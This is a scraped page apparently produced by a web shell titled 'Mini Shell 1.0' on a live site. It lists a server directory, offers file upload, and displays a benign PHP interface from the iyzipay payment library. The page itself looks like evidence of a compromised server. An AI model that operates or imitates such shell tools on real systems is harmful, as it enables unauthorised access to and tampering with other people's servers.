HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/devs.lapieza.net/vendor/iyzico/iyzipay-php/src/Iyzipay/
Upload File :
Current File : /var/www/devs.lapieza.net/vendor/iyzico/iyzipay-php/src/Iyzipay/HttpClient.php
<?php

namespace Iyzipay;

interface HttpClient
{
    public function get($url);

    public function getV2($url, $header);

    public function post($url, $header, $content);

    public function put($url, $header, $content);

    public function delete($url, $header, $content = null);
}